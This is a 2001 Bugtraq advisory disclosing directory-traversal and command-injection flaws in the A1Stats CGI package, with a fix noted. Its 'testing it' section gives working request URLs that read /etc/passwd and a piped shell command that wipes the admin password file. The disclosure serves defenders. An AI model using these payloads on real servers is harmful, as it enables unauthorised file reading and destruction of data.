[20568] in bugtraq
Advisory for A1Stats
daemon@ATHENA.MIT.EDU (neme-dhc@HUSHMAIL.COM)
Tue May 8 11:21:16 2001
Content-type: multipart/mixed;
boundary="Hushpart_boundary_bSoZyNuvXkGnWBhwKJCEGGYjGwegxNEL"
Mime-version: 1.0
Message-ID: <200105072328.QAA21115@user7.hushmail.com>
Date: Mon, 7 May 2001 19:31:12 -0500
Reply-To: neme-dhc@HUSHMAIL.COM
From: neme-dhc@HUSHMAIL.COM
To: BUGTRAQ@SECURITYFOCUS.COM
--Hushpart_boundary_bSoZyNuvXkGnWBhwKJCEGGYjGwegxNEL
Content-type: text/plain
[ Advisory for A1Stats ]
[ A1Stats is made by Drummond Miles ]
[ Site: http://www.gadnet.com/a1stats ]
[ by nemesystm of the DHC ]
[ (http://dhcorp.cjb.net - neme-dhc@hushmail.com) ]
[ ADV-0114 ]
/-|=[explanation]=|-\
A1Stats is a CGI package to track website traffic.
The package has a view files bug and also gives the
possibility to overwrite existing files.
/-|=[who is vulnerable]=|-\
Anyone using a A1Stats that was downloaded before
24/04/01.
/-|=[testing it]=|-\
To test these vulnerabilities, try the following.
www.server.com/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
www.server.com/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
These two will give you /etc/passwd.
www.server.com/cgi-bin/a1stats/a1disp2.cgi?../../../../../../../etc/passwd
This will also give you /etc/passwd but it will
show it in a very mangled manner as the CGI adds
HTML tags to what it thinks is a file it created
itself.
One can also open a file and wreck its contents.
http://localhost/cgi-bin/a1stats/a1disp.cgi?|echo%20>a1admin.txt|
will empty a1admin.txt. a1admin.txt contains the
password to change settings of the CGI. When this
file is removed, no one can log in anymore.
/-|=[fix]=|-\
Downloading the latest version will solve this
problem.
Free, encrypted, secure Web-based email at www.hushmail.com
--Hushpart_boundary_bSoZyNuvXkGnWBhwKJCEGGYjGwegxNEL--
